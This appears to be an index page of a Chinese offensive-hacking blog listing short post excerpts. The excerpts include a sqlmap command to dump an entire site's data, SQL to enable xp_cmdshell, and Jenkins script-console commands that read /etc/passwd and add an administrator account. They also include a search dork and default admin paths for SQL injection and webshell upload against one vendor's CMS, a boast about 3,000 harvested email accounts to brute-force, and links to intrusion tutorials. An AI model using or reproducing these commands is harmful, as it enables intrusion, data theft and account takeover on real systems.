一次针对JS调用框架的转向入侵思路
一次针对JS调用框架的转向入侵思路 作者:0x80看起来多奇芭的一个系统,不过还是那句话,百密终有一疏我们对于系统的源码不知道的情况下无外乎就是后台爆破、POST注入之类的,不过在这些都失效的情况下,该怎么办呢这时候可以依靠页面源代码的注释中找到,一些猫腻、于是,以DEMO的方式,进入该...
metaploit scanner与smb攻击模块
metaploit scanner与smb攻击模块我们一般可以用kali scanner模块进行探测网络的安全性随便在网络上找一个地址如www.x14hack.com接着带入kail中23.238.132.247|www.x14hack.com|CDN或代理[u117.getiis.com]首先打开msfconsole查看当前可用辅助模块show auxiliary接着我们来探测下23.238.132.247网段的FTP安全首先输入...
一次APK登录系统逻辑任意密码重置漏洞分析
一次APK登录系统逻辑任意密码重置漏洞分析 作者:0x80最近很少写文章、今天就带来一篇原理: 通过手机下载APK软件,由于找回密码参数的telephone未进行有效过滤, 可使用任何手机号码发送验证码截取数据包、在重置更新密码的、同时改掉tele...
APK,IOS注入漏洞常见搜寻方式
APK,IOS注入漏洞常见搜寻方式 作者:0x80简单写一篇、关于APK,IOS注入漏洞常见搜寻方式 APK,我们动都熟悉,安卓(Android) 一些APP,可提供用户下载、那么APP本身有没有问题呢,...
一段SQLMAP命令脱掉整站数据
一段SQLMAP命令脱掉整站数据存在的注入点sqlmap.py -u http://127.0.0.1/as.php?id=" -D "要脱的数据库' --dump-all...
意外得到163,3000个邮箱账号,剩下的就是爆破了
意外得到163,3000个邮箱账号,剩下的就是爆破了...
1433 SA 升权代码
1433 SA 升权代码碰到SA权限降权的时候需要在SQL查询分析器里,输入EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;即可升权代码...
Jenkins CommonCollections
Jenkins CommonCollectionsprintln "cat etc/passwd".execute().text 需要配合SSH反弹WIN println "net localgroup administrators xxx/add".execute().text...
某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL
某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL 作者:0X80inurl:index.php?ie=
技术支持: 宝鸡市世纪网络技术有限公司默认后台:Adm/governlgn.php 或者 Admin/governlgn.php均存在POST注入进入后台,可设置上传类型,直接GETSHELL,不要做坏事额...
0x80历届视频教程经典回顾(提供下载)
0x80历届视频教程经典回顾(提供下载)XP系统内网提权下载地址:http://pan.baidu.com/s/1dD3riTz全手工php注射+注入root+hex,mid函数,load_filehttp://pan.baidu.com/s/1jGxaq7Glinux 提权 http://pan.baidu.com/s/1o6I8pLK ;解压密码:80bad实战秒掉某银行http://pan.baidu.com/s/1jGFsZky...